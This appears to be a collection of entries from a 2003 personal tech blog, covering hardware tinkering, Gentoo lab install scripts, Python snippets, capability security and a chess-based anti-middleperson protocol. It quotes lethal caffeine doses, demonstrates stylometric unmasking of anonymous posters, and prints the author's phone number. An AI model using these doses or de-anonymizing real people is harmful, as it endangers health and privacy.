    How the heck, 3 weeks into term, have I ended up with 2 odd socks? I always put a matching pair on in the morning and I'm pretty sure it stays that way during the day. It would be pretty tough to change one of my socks without me noticing. Perhaps if aliens were performing snap abductions just in order to do this (I can't think of any other way) but that would be frankly mind boggling.

    And it's not like there's a lot of places to hide a sock in my room. Sure, there's a fair amount of junk on the floor at any one time, but it gets turned over pretty often and if they were hiding in it I would be covered in random socks all the time; and I'm not. There's also always a fair amount of lint in the tumble dryer after a wash, I suppose. But I don't think that my socks (which survive so much during an average day) are getting atomised by a mere dryer.

    There's just no way that amotile inanimate objects could do this - which leads me to conclude that socks aren't in fact inanimate. Given the state of some people's shoes at the end of a day it wouldn't take too much for intelligent life to develop, I'm guessing. And, by definition, life tends to replicate so perhaps a number of everyone's socks are normal and the rest are living socks - able to run away at will (sorry about the pun) and so everyone is left with the odd, non-living socks.

    Just a couple of interres...

    Just a couple of interresting snippets from New Scientist that I picked up this morning:

    Firstly, there is a really terrible soap called Eastenders in the UK, possibly we export it too - I'm not sure. Anyway - like any soap it's completely over the top; at least it seems that way. New Scientist has figures averaged over the 18 year run time of Eastenders:

    BehaviourReal Life (% of pop)Eastenders (% of pop)
    Homicide0.0016 %/year0.22 %/year
    Rape0.3 %/year0.35 %/year
    Infidelitywomen: 9 %/year, men: 14.6 %/yearwomen: 2 %/year, men: 1.7 %/year
    Men paying for sex4.3 %/year0.18 %/year
    Deceived fathers10 %/year5.8 %/year

    So, except for homocides, Eastenders is actually tamer than real life (consider that rape is vastly under reported in offical statistics). That is a deeply depressing thought.

    On another topic, a couple of pages later

    The vassopressin receptor gene (...) is controlled by a promoter whose length varies between species. The expression of this gene in certain parts of the brain in rodents seems to be necessary for them to form monogamous pair bonds - to fall in love, as it were.

    (...) the prairie vole has a 460-base-pair insert in the gene's promoter which is lacking in its close relation, the montane vole. This has the effect of causing the gene to be expressed in a part of the paririe vole's brain where it is absent in the montane vole. It makes that part of the brain sensitive to vasopressin, a molecule released into the brain by the act of sex. (...) the male prairie vole becomes "socially addicted" to females it has had sex with, whereas the montane vole is socially indifferenet to its mates. (... the first species is monogamous, the second polygamous ...) The human vasopressin receptor gene looks not unlike the parires vole gene in both its promoter length and its expression pattern. But it varies in length between individuals. (...) the probability of divorce is highly heritable, and adopted people are more like their biological parents than their adoptive parents in this respect.

    TINI

    Well, all my exams are finally over (most of them went ok) so it's back to play time and today's plaything is a TINI

    It's a small (SIMM sized) Java processor that can drive a couple of serial ports, a 1-Wire net and Ethernet (10BaseT). Although the TINI itself is only SIMM sized, the connection board is a fair bit bigger; though still pretty tiny.

    The SDK contains a Java app that is supposed to load the firmware via the serial port and could I get it going? Could I bugger. I spent about 4-5 hours swapping serial cables/making serial cables/swapping computers. At one point I even had it plugged directly into the back of a computer just to eliminate cabling from the equation. After a while I decided that I couldn't possibly make it any worse and decided to play with the last option left - supply voltage. Now, the manual says it takes 5V +/- 5%, but (despite the LED being on at 5V) it only came to life at 7.5V. Aggh! Anyway - it's working now.

    It starts up a telnet and ftp server and you can upload preprocessed Java class files to it for execution. On the 1-Wire port I currently have a DS1820 temperature sensor (which says that it's 21C in Systems at the moment). Hopefully in future there will be a number of TINIs around the department with a number of DS1820s monitoring comms and machine rooms.

    If you like, you can reach it (for a while at least) at tincan.doc.ic.ac.uk.

    Nothing to see here for a...

    Nothing to see here for a while - I have maths exams all this week

    Due to a couple of oversi...

    Due to a couple of oversights (nothing to do with me, honest!) the whole Freenet website was lost today and SF can't/wont restore it from backup.

    So this evening has been a process of setting up CVS to sync to the live website on the fly and digging around in Google cache for all the snippets I can find of the website in order to patch it together again. Phew.

    With pot and porn outstripping...

    Zooko:Structure and Inter...

    Zooko:

    Structure and Interpretation of Computer Programs: Update: I'm stuck on exercise 1.13.

    Done:

    Proof of 1.13

    (or as a PDF)

    X-Men 2

    Deep as a puddle, but great fun. Go see.

    Jeff is also thinking abo...

    Jeff is also thinking about writing style recognition like I was a few days ago.

    It's nice to know that ev...

    It's nice to know that even wizards can have total brainfarts at times (from BUGTRAQ):

    The default behavior of the runtime linker on AIX is to search the current directory for dynamic libraries before searching system paths. This is done regardless of the executable's set[ug]id status.

    This story recounts one author's experiment with a Tip Jar system for funding a book. Now, this is good reading because there haven't been enough tests despite all the advocation that these business models gets from people like me. But the book itself is fantastic.

    Lethal Dose of Caffine

    Erowid (the usual reference for all your interresting drugs) was giving a couple of different values for the LD50 of caffine and I couldn't find a definative value for it. Here's the reply from Erowid that I got:

    Thanks for your note. I went back to check where the 75mg/kg
    number came from and, unfortunately, the website reference I had for it no
    longer exists. Calculating estimated LD50s for
    humans is a tricky business I'd rather not get into, so I decided
    to simply change the number to the known LD50 in rats, which is
    192 mg/kg oral.
    
    I was able to find some numbers for lethal doses in humans (not
    LD50, but doses that actually killed the individual). A couple of
    those were IV rather than oral and were significantly lower than
    75 mg/kg (57 mg/kg in one case and 7 mg/kg in another). The
    estimate of 150 mg/kg in the caffeine faq is in the right ballpark
    for an oral human LD50.                                                
    
    Kernel 2.5.68

    As the kernel staggers towards 2.6 pre series I thought it might be worth trying it out.

    Short version: it doesn't boot yet

    Longer version: Booting gets as far as the AIC7xxx driver - which hangs. Removing that drivers lets it get as far as the megaraid driver which complains all about all the error handling code that it's missing and then takes a 3-4 minutes to scan all the LUNs. Then ALSA hangs. Removing ALSA reveals that the megaraid driver didn't manage to find my RAID array and so has nothing to mount as root.

    So it will be a little longer yet I'm guessing

    How to lose weight and ha...

    From this:

    Sam had to agree to handle the hardware abstraction layer (HAL) and not release the code he wrote for that component because Atheros uses a software defined radio (SDR). The company (and any individuals involved) could face huge headaches if they released code that allowed direct and simple manipulation of the SDR to work outside of a, b, or g ranges. He'll have precompiled binaries for many processors.

    So the company would be in trouble for selling a software defined radio? Is this another DMCA style peice of legal stupidiy? I'm generally pretty hopeless with hardware (I leave it to the EE dept) but even I think I could build a radio! How does banning the sale of SDRs help anyone?

    Personally, I could have great fun with a good SDR. Roll on GNU Radio! (did I read somewhere that they announced a cheaper USB device at O'Reilly ETCon2?)

    Invisiblog

    Imperial shifted fileservers yesterday, which is why IV was giving access denied errors. In fact, due to the wonders of NFS, it may be down for a while longer as stale filehandles are removed.

    Invisiblog is a mixmaster based blogging system designed for totally anonymous blogging. This kind of stuff really appeals to me in a "yay freedom!" kind of way. If I had the hosting that could take the traffic and legal problems I would have done this sort of thing a while back - it's good that someone else has.

    But I would wonder exactly how anonymous they are. I have all the usual faith in Mixmaster and they seem like sensible people so I'm assuming no stupid screwups. But it's really hard to avoid slow intersection attacks.

    (Aside for people who don't know about intersection attacks: Assume I said "I was on the I10, going to work when the sun got in my eyes and I hit the central barrier, leaving a bright red mark on the barrier and a big dent in my door". From that we can say that the writer a is a member of the intersection of a) the set of people who live in LA (high chance) b) the set of people who are driving east in the morning (the sun got in their eyes) c) the set of people who have a dent in their left door / paid a garage for repairs sometime soon after d) the set of people with red cars)

    Even your style of writing can give a fair amount away. As a quick test I wrote a short python script to find the mean and std dev of the numbers of 4 charactors (';', ',', '-', '?') in each sentence and the length of each sentence.

    Given some sample data. (Where would you go to find long, rambling prose? The Freenet mailing list archives of course! ) Here are the results for 3 people:

    Ian: [(0.0, 0.0), (1.173, 1.028), (0.464, 0.677), (0.042, 0.204), (110.536, 52.722)]
    Oskar: [(0.0, 0.0), (0.675, 0.812), (0.253, 0.464), (0.12, 0.328), (97.409, 60.337)]
    Matt: [(0.024, 0.153), (0.689, 0.905), (0.262, 0.642), (0.19, 0.395), (77.963, 59.192)]
    

    (I would have included Scott, but he doesn't say enough!)

    There are a fair number of differences even in this trivial test. If they use semi-colons - it's Matt. Lots of commas? Ian.

    So, given someone who seems to know a lot about Freenet I think I could narrow it down a fair amount using this very simple test by analysing the list archives. (assuming that they post to the list)

    The lesson is: be very careful

    Scapy

    Scapy[via LtU] is a domain specific language for manipulating network packets. Actually, it's a thin wrapper around a Python read-eval loop and all the better for it.

    Also, it makes for a very neat Python packet manipulation library. Have a look at the homepage (linked to above) for a transcript demonstrating some of its neat little features.

    % python scapy.py
    Welcome to Scapy (0.9.11.1beta)
    >>> net = Net ("127.0.0.0"/24)
    >>> list = IP (src = Net)
    >>> for x in list:
    ...  print repr (x)
    ...
    <snip>
    <IP src=127.0.0.246 |>
    <IP src=127.0.0.247 |>
    <IP src=127.0.0.248 |>
    <IP src=127.0.0.249 |>
    <snip>
    >>> Ether()/IP()/TCP()/"123"
    
    
      
      

    New signing only key

    Since I handle nearly all my email on DoC servers now I need a signing only key because I don't trust them with my main key. Outgoing mail from me should be signed by this key. This key is not secure, however. Anything for which you would generally require a signed message should still require a message signed with my main key. Although you can encrypt to this key, doing so would be stupid.

    -----BEGIN PGP PUBLIC KEY BLOCK-----
    Version: GnuPG v1.2.1 (GNU/Linux)
    
    mQGiBD6lQFIRBACpwWqCQF26SdILeV2TwrCygvkIxPKlp+qqZTMymyewEKVZ9+2L
    utXBHJxhSfJnQA12Oijmu6vx+7uCYdnR+yx/oW5Q1jhDymz+ASfsXJtAUFOERCQN
    n/JjeVJCM3EMLVnlMo1oDTioxfFClHDz0lRAZS5pAPZWpVJbrs24jgzeIwCgxJx8
    Tk7yPcI4bc0cIEvEbypi+wcD/12zXIFYir2eofG+4vxz+lMyHo5LXz8E4jSRWJTZ
    a7OOzz3PyT96mShPJ34pZLZuwbE4fK7Kvzr0rAo95E2pVXoe0r7croCOs51JXc/p
    LFiSexJvF8IN4bhehOy41SAM+86TNjQFZ9KISnWWBzpMXdQki8QpfhDP7BoiiJHk
    g3s0A/0Tddp5PV++ERzp7OyD+4IgqJyiGlqOo0Mm7q4BJ+tVul9pCtj+lRpDSJpf
    WLRSWKp3+8tLK1pQ0Ds0Cco37Ug8spbQzE7klxCpAMNzoYUfIDatWwTVkPSpPjgg
    LbG6OHuIjzJtddbcDISATWqoBevEn5Gd3XXy4bdKpW+pLzE2PYhhBB8RAgAhBQI+
    pUHJFwyAEZETJWrMD3GmTIRQh82lUt8stj1gAgcAAAoJEJj1NEYcnWNMSvkAnR8C
    fvFXTA5m5isr+6ruTrfK2PmoAJ9YwEMDByNh0MjgEcsF4DPSMRY037Q+QWRhbSBM
    YW5nbGV5IChOb24tc2VjdXJlIHNpZ25pbmcga2V5KSA8YWdsQGltcGVyaWFsdmlv
    bGV0Lm9yZz6IXwQTEQIAHwUCPqVAUgUJAeEzgAQLBwMCAxUCAwMWAgECHgECF4AA
    CgkQmPU0RhydY0z9WwCfb+SpaHAqDqhsZiNGrTK6rLojuh8Anj/U/LpHkUIs5HzZ
    QlUM89IKGHH7iEwEEBECAAwFAj6lQRoFgwHhMrgACgkQzaVS3yy2PWCciQCfaTsY
    hE3fUzoYrhWuzEsMihcJY4cAn0GCjb+yq/7pJ3/4+BNAEE/llU6wuM0EPqVAVBAD
    AJ/c6QLy7yfZQN/w1AwnD845/PhQh4kOw8tAqVCkfR3+qBSvhWwTYsqzEMujGExw
    SKlSwPyOgoRgzdVF7f4Jr9xRJbHZCF9RMMQiqabzgoXxHRU/0JxnJzf0WASxiTMN
    pwAECwL+OLVlgTpb0gT8iRUY3VwzAyL4gMlkf+5eLSteUGv9PsZhzvHeZBPPv4wE
    VQSEJczbpCJp3wOia9lkEm94HCVQ4whxi6lsoh5pGB0Fi/A50kliA22uMuvf4jwZ
    PKHn7K5oiEwEGBECAAwFAj6lQFQFCQHhM4AACgkQmPU0RhydY0wIoQCgqW1Y+ea/
    ASVDzgzRmRXxjMYJe+gAoMDScujnY2t4ZQgNuW0CvuXOQWvE
    =9hlG
    -----END PGP PUBLIC KEY BLOCK-----
    

    Persistence

    Over the past few weeks I've been knocking about with ideas (which generally go under the name of Landscape) for holding data between code. Generally a byte stream (be it a pipe or a file) is the highest we get when sharing data. Too much data is far too difficult to get to and too little data is well linked.

    One key part of fixing this could be a persistent object store and I've been messing with Python versions of this. Firstly, ZODB is far too slow and Prevayler keeps everything in memory.

    Prototype 1

    This kept data in XFS extended file attributes and each object was a file.

    Pros:

    • Nice kernel interface for non-Python code to use

    Cons:

    • Requires XFS
    • Inflexible
    Prototype 2/3

    This used SQL to store the objects.

    Pros:

    • Again, a nice interface for non-Python code
    • SQL has transaction ability
    • Backlinks are handled just by a different SQL query

    Cons:

    • SQL is pretty slow - would have to read and write cache
    Prototype 4

    This uses proxy object that act as far pointers and pickle/unpickle objects on demand

    Pros:

    • Deals with any pickleable Python object (e.g. most of them) well

    Cons:

    • Pain for anything non-Python to use
    • At the moment the code is a bit flaky. Playing with the garbage collector is a dangerous (and non-deterministic) game.
    Ramblings

    These are, of course, only prototypes to play about with these ideas. The true way to do it would be to use EROS. But EROS isn't seeing much take-up (I've not even got it to boot) and it might be better to put the neat bits of EROS into Linux, even if they don't all fit.

    Prototypes 1 and 2 only support dictionary type data and Prototype 3 has slightly bodged support for other objects (they can have a .type link, pointing to the python code to be imported). Supporting other types of objects is very important for objects like (for example) the mixer which has to get and get its values from/to somewhere else.

    The interface is also very important. Finding the right set of ideas to simply abstract data is a very hard problem. The interface to the same is possibly just as hard.

    At the moment the interface is shell like but different types of objects will need more than that. It remains to be seen if some objects will need to handle the interface themselves to the level that they do today (e.g. GTK/QT level APIs) or if a system akin to XHTML/CSS will do.

    Evil Bits

    When putting my email address on webpages I usually have it as aglREMOVETHIS@imperialviolet.org. Spammers have never bothered to try and decruft these addresses because there was always lower hanging fruit.

    Well, today I got email addressed to aglTHIS@imperialviolet.org. I guess the fruit isn't so low any more.

    A reply that the author of the `evil bit' RFC (3514) got. Note the company name at the bottom. (it was an April Fool's joke - for those who don't know))

    What or who determines the "evilness" or "goodness" of the packet? If a security admin or OS can determine or flag bits as good, what keeps the hacker from spoofing this process by setting the bit to "good"? Does the bit change based on behavior? Or maybe a database with signatures of "bad" bits?

    (name deleted)

    Microsoft Corporation

    Nothing much to put up he...

    Nothing much to put up here. Been revising lots and still waiting for the CapPython PEP . Wondering about interfaces on landscape, but I doubt I'll do anything about that for a long time.

    The dog's sprained something and now has a leg in bandages.

    LuFS

    Ok, LuFS is pretty fantastic. Unlike all other other userfs implementations that I've come across it actually works, and it's fast. Using its localfs module (which just tests the LuFS interface by mirroring the existing filesystem) the speed difference is epsilon. Certainly for networked filesystems the LuFS latency is swamped by the network.

    It's FTP and SFTP modules really work quite well, I certainly expect to be using the SFTP one when I'm back at Imperial.. It also supports autofs mounting so that you can just cd into (say) /mnt/sftp/agl@somehost and it will sftp (or ftp) mount it for you on the fly.

    And the localfs module could be a wonderful way to chroot some difficult programs by mapping on a configured set of directories read-only. Though it would need some of the grsecurity kernel patches for it to actually be secure.

    Capability Python

    Zooko's blog had been down for a fair time as he changed hosting, so I only noticed today that he had started posting again.

    Recently, he's been talking about adding capabilities to Python and, oddly enough, I was thinking about the exact same thing yesterday. If some of the introspection abilities of Python were limited, it would make a very effective capability language by using references as a capabilies. Thankfully, from following some of the links on the python-dev archives (below) it seems that a PEP is being worked on.

    Once the language is limited, the standard library needs to be looked at. The Python people aren't going to accept the gutting of the library for the needs of capability freaks, so many of the modules will have to be proxied as they have dangerous functions (for example, taking a filename not a file handle).

    Also, some of the standard functions (thinking of __repr__ here) leak a little too much information and could be trimmed without loss of useful funtionality. Leakage increases the bandwidth of side-channels. You can never be rid of side-channels, but you can stomp them as much as possible.

    Zooko has also written a nice crypto paper. However, I had to scribble notes when reading it and hope that this version is a little easier to understand:

    Defence Against Middleperson Attacks:

    Zooko, <zooko AT zooko DOT com>

    The Problem

    Alice thinks she's pretty hot stuff, chess wise, and bets that no one can beat her in a game. Bob takes her up on this challenge and the game commences. Unknown to Alice, Bob is also playing a game against a chess grand-master. Whenever Bob gets a move from Alice, he plays that move against the grand-master and relays his response to Alice. The grand-master trounces Bob, and so, Bob trounces Alice. Bob wins the bet.

    Somehow, Alice wishes to know that the identity of the person playing her matches a given public key. That way, if she encrypts prize to that key she knows that Bob cannot cheat her - the surprised grand-master would get the goodies.

    The Solution

    Dramatis Personae

    • Alice's Move: m1
    • Bob's Move: m2
    • Alice's Public Key: PKA
    • Bob's Public Key: PKB
    • Random Nonces: n1 and n2
    • A Shared Integer: K

    Alice is ready to make the first move in the chess game. She calculates:

    • Message1 = (m1, PKA, n1)
    • Commitment1 = Hash(Message1)

    Alice transmits Commitment1 and sleeps K seconds. Alice transmits a signed copy of Message1

    After Bob receives Commitment1 he sleeps for K seconds. He then waits to receive the signed copy of Message1. Bob verifies that Message1 was signed by the included copy of PKA, and that Commitment1 is correct.

    Bob quickly ponders his move and calculates:

    • Message2 = (m2, PKB, PKA, Message1, n2)

    Bob signs Message2 and encrypts the signed copy with the PKA from Message1. He transmits this.

    Alice receives the signed and encrypted Message2. If more than K seconds have passed since she send Message1 she aborts the game.

    Otherwise, she decrypts Message2 and checks the signature against the included PKB and that her public key is correct.

    Results

    • The person who knows the private key which matches public key PKB is also the person who made chess move m2.

      Consider the plight of Bob, who tries to play Alice against a grand-master (who also follows this protocol). Bob must alter the public key in Message1 because the grand-master's reply is encrypted with it and Bob must substitute his key into the reply. Thus, Bob must wait for both Commitment1 and Message1 before he can forward either to the grand-master.

      However, he has to get the reply back to Alice K seconds after send sends Message1, but the grand-master is waiting at least K seconds after he receives the altered Commitment1 from Bob.

    • The person who knows the private key which matches public key PKB signed Message2, so he knew the correct Alice public key and he knew Alice's original chess move.
    • Since Message2 was encrypted with Alice's real public key, it was not possible for anyone to read the contents of Message2.

    Assumptions

    • K is great enough to ignore transmission times, and for Bob to consider his move
    • Everyone uses the same value for K
    • The public key cipher is secure and the hash is uninvertable.

    UserFS

    LuFS seems to be a userfs that it actually being worked on. I haven't tried it yet, but it could be promising.

    And it even has coderman's P2P fs as an experimental module

    Python Snippits That I Know I'll Be Hunting For In The Future

    Some notes on the stuff I was talking about yesterday. People are welcome to jump in with comments if they like, but this is mostly for me to recognise when I've gone in a circle.

    A terminal log from my knockup in Python. This uses setxattr and friends. It's a new toy in the kernel (go read the manpage) but only XFS supports it correctly. I think the terminal log pretty much speaks for itself

    List: 
    unsorted                 {e0cb6e07b63cd592cad592bbb2c4f37a}          
    title                    Root                                         
    keywords                 {904f3b6ed1f0bdc87cf11232eea4292b}          
    comp                     {f3d00322003197219ed873a87135f09c}          
    people                   {f2124f6ef95e9c0cb6899b32741ea969}          
    types                    {89b870c400af24726b0095896587a10f}          
    
    > ...unsorted 
    > List:       
    syncthreading.pdf        {Sync Threading}                             
    TR-94-06.pdf             {Control Transfer in Operating System Ker... 
    CIRCA_whitepaper.pdf     {CIRCA Technology Overview}                  
    core_vulnerabilities.pdf {Advanced Buffer Overflows}                  
    RC22534Rev1full.pdf      {Thirty Years Later: Lessons from the Mul... 
    
    > ...syncthreading.pdf 
    > List:                
    title                    Sync Threading                               
    type                     {PDF}                                        
    filename                 syncthreading.pdf                            
    author                   {Adam Langley}                               
    
    > ...author 
    > List:     
    email                    agl@imperialviolet.org                       
    title                    Adam Langley                                 
    
    > Pop   
    > List: 
    title                    Sync Threading                               
    type                     {PDF}                                        
    filename                 syncthreading.pdf                            
    author                   {Adam Langley}                               
    
    > :view 
    xpdf /home/agl/lscape/1931bdf5e54e08edc866b00ff0f2a6a0&
    

    In this model there are strings, objects, bags and lists (collectively elements). Objects are unordered (string, elements) pairs and most of the things in that log are objects. Bags are unordered sets of elements and lists are ordered vectors of elements.

    That works to a point and I was just about to add backlinks to every object as bag of backlinks and a link called .backlinks. But, while links from objects are named the backlinks would never be. This is ok in some cases (such as structral links), but most of the time it matters that you were linked to with the name author because that has information value in the other direction as well.

    So links are:

    • Properties: named at both ends, though it's important that each object knows which end it's on
    • Pointers: named at the source end only
    • Links: unnamed at both ends (bags and lists consist of these)
    (if you are an RDF type, think of Properties as Triples. I may end up with an RDF model, but I'll make my own why there)

    Now, should I allow multiple Properties with the same name from the same object or force them via a bag? Objects are going to have multiple incomming Properties with the same name, so I don't see why not.

    Also need to think about indexes

    Disabling terminal line buffering

    from termios import *
    
    IFLAG = 0
    OFLAG = 1
    CFLAG = 2
    LFLAG = 3
    ISPEED = 4
    OSPEED = 5
    CC = 6
    
    def save (fd):
            return tcgetattr (fd)
    
    def restore (fd, data):
            tcsetattr (fd, TCSAFLUSH, data)
    
    def nobuffer (fd, when=TCSAFLUSH):
            """Disable terminal line buffering."""
            mode = tcgetattr (fd)
    
            mode[IFLAG] = mode[IFLAG] & ~(INPCK | ISTRIP | IXON)
            mode[CFLAG] = mode[CFLAG] & ~(CSIZE | PARENB)
            mode[CFLAG] = mode[CFLAG] | CS8
            mode[LFLAG] = mode[LFLAG] & ~(ECHO | ICANON)
            mode[CC][VMIN] = 1
            mode[CC][VTIME] = 0
            tcsetattr(fd, when, mode)
    

    Why on earth isn't fold an inbuilt function? (this is a left fold)

    def fold (f, lst, init):
            cur = init
    
            for x in lst:
                    cur = f (cur, x)
            return cur
    

    Longest common prefix of two strings

    def common_root (s1, s2):
    	"Longest common prefix of two strings"
            n = min (len (s1), len (s2))
    
            for x in range (n):
                    if (s1[x] != s2[x]):
                            return s1[:x]
            return s1[:n]
    

    And tab completion

    p = filter (lambda x : x.find (b) == 0, comps)
    if (len (p) > 0):
    	root = fold (common_root, p, p[0])
    	if (len (root) > len (your_current_string)):
    		your_current_string = root
    

    Fantastic quote from Bram...

    Fantastic quote from Bram

    In other good news, the IETF announced a new policy in RFCs against using MUST to describe behavior which is widely violated in practice, especially when that violation won't change for the forseeable future

    Sigh. Another April 1st a...

    Sigh. Another April 1st and, once again, we have an April Fool's overload. Come on people, only post them if they're any good!

    I sent the following to coderman in reply to this blog entry. It was a little rushed since I was typing over a dial-up ssh (as am I with this actually) and it has inspired me to actually code up something, even if it's far short of what it could be. Hopefully it will give some insights (agl's nth rule: you don't understand it until after you code it).

    What you are talking about it very close to `the Unix philosophy'. One of the
    fantastic things about Unix is: cat /dev/sda1 | gzip > /backup/`date +%s`.gz
    
    Utility goes up super-linearly with the number of pluggable components.
    
    Now this stuff gives me nightmares, mainly because I'm generally always
    thinking about this stuff off and on, and have been for years. Your design of
    interfacing P2P with the filesystem is a good example of increasing the utility
    (and usability, from my point of view) of an application by exposing it using
    common interfaces. The design of those interfaces is just fantastically
    difficult.
    
    The `everything's a file' idea of Unix is good. But what is really missing is a
    userfs module in the kernel. Such things have existed at points in time, but
    never has there been a polished one (or even one included in the main kernel
    src). This limits the filesystem abstraction to devices and a few other little
    things and leaves bodges like PRELOAD libraries and GnomeVFS around. But we
    really need to expose application data and not have to end up writing fragile
    regexps which break on every minor release.
    
    I'm always wondering about designing a `better' system for this but generally
    get stuck in a loop:
    
    * Requires a fantastic number of components
    * and a lot of abstraction points that we don't have at the moment
      (most programs output falls into a few simple blocks like `typed table'
       (think `ls`) or `dictionary' (something like ifconfig) or nestings of the
       same. ls shouldn't know anything about terminals, it should just output
       a table and let the UI handle if (if the output is going to a UI). But then,
       if we are doing this properly, all code should use `ls` to get directory
       listings and that's a lot of forking and stuff data over pipes. Thus...
    * it would be fantastic if everything was in a single address space
    * so a `safe' language is needed. Quite possibly a new language completely
    * but that's a hell of a lot of work and makes the barrier to adoption
      pretty high.
    * So we cut down the number of components and dream about making it better..
    * 
    
    (that was a bit unplanned, but I'm on a metered dialup at the moment I'm
    afraid.)
    
    -- Adam Langley agl@imperialviolet.org http://www.imperialviolet.org (+44) (0)7986 296753 PGP: 9113 256A CC0F 71A6 4C84 5087 CDA5 52DF 2CB6 3D60

    Seems that the US may have used an EMP...

    Term's over, so I'm back ...

    Term's over, so I'm back home and back on a dialup and ferrying floppies between computers whenever I need to get anything onto my computer. Ah, the joys of non-IC Internet connections.

    Just before I left I pretty much had an automatic installation of Gentoo working, we'll just have to see if I can remember what on Earth I was doing when I go back in 5 weeks.

    This holiday will be mostly revising, so there's no going to be much stuff worthy of posting here going on, but there are some new photos of my halls Xmas party up.

    Epoll

    From LWN

    One aspect of the epoll interface is that it is edge-triggered; it will only return a file descriptor as being available for I/O after a change has happened on that file descriptor. In other words, if you tell epoll to watch a particular socket for readability, and a certain amount of data is already available for that socket, epoll will block anyway. It will only flag that socket as being readable when new data shows up.

    Edge-triggered interfaces have their own advantages and disadvantages. One of their disadvantages, as epoll author Davide Libenzi has discovered, would appear to be that many programmers do not understand edge-triggered interfaces.. Additionally, most existing applications are written for level-triggered interfaces (such as poll() and select()) instead. Rather than fight this tide, he has sent out which switches epoll over to level-triggered behaviour. A subsequent patch makes the behaviour configurable on a per-file-descriptor basis.

    Fantastic, level triggered interfaces are nicer because they need less system calls. With edge-triggered you always need to call read/write until it EAGAINs otherwise you can miss data. That means at least 2 calls per edge, while level triggered generally means only 1 call per edge.

    Also, edge-triggering causes locking headaches when dealing with mutlithreaded apps and with these patches it should be possible to quite simply alter existing code to use epoll.

    Happy (Belated) Birthday IV!

    I totally missed it, but IV (in it's current form) was 1 year old on March 11th. Woo!

    I can now read what I was doing a year ago, which is nice. Oddly enough, I was doing pretty much the same thing... (read on)

    Mass Installing Gentoo

    Dept/Computing at Imperial has rather a lot of computers, as I'm sure you can guess. Nearly all of them install from a common base in order to keep the sysadmin tasks manageable. At the moment that base system is SuSE 7.2, with a few key packages upgraded (X, kernel, JDK and so on). Of course, SuSE 7.2 is getting a bit old now and we are looking for a new install for the coming year.

    We are testing a lot of distros, but at the moment I'm trying Gentoo. Good points:

    • It's very easy to autoinstall because the packages shutup (see below)
    • It's very current

    Bad points:

    • Since we cannot afford to build from source we have to install binary packages, thus they can only be optimised to fit the lowest class of CPU (PPro for us I believe)
    • Gentoo packages break a fair amount (missing dependencies etc)
    • The gentoo-sources kernel package is just crap

    To autoinstall it I have a GRUB boot disk that TFTP/NFSroot boots a 2.4.20 kernel with init=/bin/bash. That (will, at the moment you have to type a command line) run a Python script that uses finds the IP of the box (kernel does DHCP), does a DNS lookup to get the hostname and uses a config file with regexps on the hostname to find a series of scripts to run.

    I have a quick python module to handle writing partition tables, other than that the scripts are at the bottom (these aren't final by any means)

    Everything is installed from binary packages built on a 2-way Xeon (which looks like a 4-way because of hyperthreading). The grub packages seem broken at the moment, however.

    If you look at the scripts, all you need to do is mount the /usr/portage directory from the server and make /usr/portage/distfiles a tmp area.

    #!/bin/sh
    
    /sbin/mkfs.xfs -f /dev/ide/host0/bus0/target0/lun0/part2
    /sbin/mkswap /dev/ide/host0/bus0/target0/lun0/part1
    swapon /dev/ide/host0/bus0/target0/lun0/part1
    mount -n -t xfs /dev/ide/host0/bus0/target0/lun0/part2 /mnt
    
    import partitions
    
    def run():
            p = partitions.PartitionTable("/dev/ide/host0/bus0/target0/lun0/disc")
            p.add_size (0x82, 512, 0)
            p.add_size (0x83, -1, 1)
            p.write ()
    
    cd /mnt
    tar xjv < /stage1-x86-1.4_rc3.tar.bz2
    mount -n --bind /usr/portage /mnt/usr/portage
    mount -n --bind /mnt/tmp /mnt/usr/portage/distfiles
    cp /etc/make.conf /mnt/etc/make.conf
    cp /etc/resolv.conf /mnt/etc/resolv.conf
    cp /etc/ld.so.conf /mnt/etc/ld.so.conf
    cp /config/gentoo-systems/internal /mnt/internal
    chmod a+x /mnt/internal
    chroot . /internal
    
    cd /
    umount /mnt
    
    #!/bin/sh
    
    source /etc/profile
    ldconfig
    emerge -K gcc gettext glibc baselayout texinfo zlib binutils
    ln -sf /usr/share/zoneinfo/Europe/London /etc/localtime
    emerge -K system
    emerge -K kde
    emerge -K prelink
    emerge -K sysklogd
    emerge -K grub
    emerge -K vim
    emerge -K libogg
    emerge -K libmng
    /usr/bin/fc-cache
    mkdir -p /boot/grub
    cd /boot/grub
    cp -a /usr/share/grub/i386-pc/* .
    printf "root (hd0,1)\nsetup (hd0)\n" | grub
    
    umount /usr/portage/distfiles
    swapoff /swap
    umount /usr/portage
    umount /dev
    umount /proc
    mkdir /lib/modules/2.4.20-xfs

    Stage Craft

    Another busy day yesterday. Setting up some lights (I'm in the very light brown t-shirt). And the results of those lights (think what it would have looked like if we had used green gels and inside the venue (which was generally quite empty because everyone was downstairs for Artful Dodger)

    Quarantine - Greg Egan

    Greg Egan is a fantastic author and Quarantine is one of his very early books, and it shows a little. The book is full of the usual wonders of Egan's ideas but I felt that the ending was a little weak. I couldn't say why, there was no good reason why it wasn't a good ending - had a neat little twist and there weren't any loose threads left, but I felt like it didn't quite get back to the home key (GEB reference, for those who get it).

    You know it's time to upgrade when...

    ... the load of the box you're building Gentoo packages on can't hit the number of processors because it can't download source code fast enough when it's comming in at 1.6MB/s.

    Not too much been happening. Building lots of Gentoo binary packages for possibly installing on department lab machines next year (see above). Point to note: the userpriv option breaks stuff.

    Maybe with 64-bit address spaces we can finially get rid of filesystems as a user visiable system and all switch to single-level persistent object stores. Anyway, AMD looks like they have the best 64-bit offering at the moment and EROS's 2002 paper on single-level store design is here

    Valenti Speech

    Valenti's speech is quite good. Apart from the file that he's wrong in almost every important point, he speaks very well. I don't know if he gets things wrong because he really doesn't understand, or that he's just trying to find an acceptable cover for his clients' greed.

    He simply (seemingly) doesn't get that there is something fundamentally different about my physically depriving you of something and taking a copy. Of course, it's profitable to ignore that. He also asserts (unquestioned) that there are no alternate business models. Of course, it's profitable to ignore them (for the moment). He also doesn't get the difference between information and the physical expression of that information. Of course, it's profitable to treat information as a product.

    He just fundamentally doesn't get it. I wish I had a transcript of his answer to a question about DVD Region Encoding where he just assumes that the legal system is there to uphold whatever he deems best. It's just breathtaking arrogance.

    Nagios

    Nagios looks like a really good status monitoring tool. Have a look at the demo. I hope to get it going in DoC, but it requires a heck of a lot of installing. Thankfully there are (nearly) wonderful Gentoo ebuilds which do everything needed. (Only nearly wonderful because the ebuild had a bug; patch mailed to the maintainer. On the same note, the prelink ebuild also has a missing dependency to libc6-2.3.2; patch send to, and acked by, the maintainer).

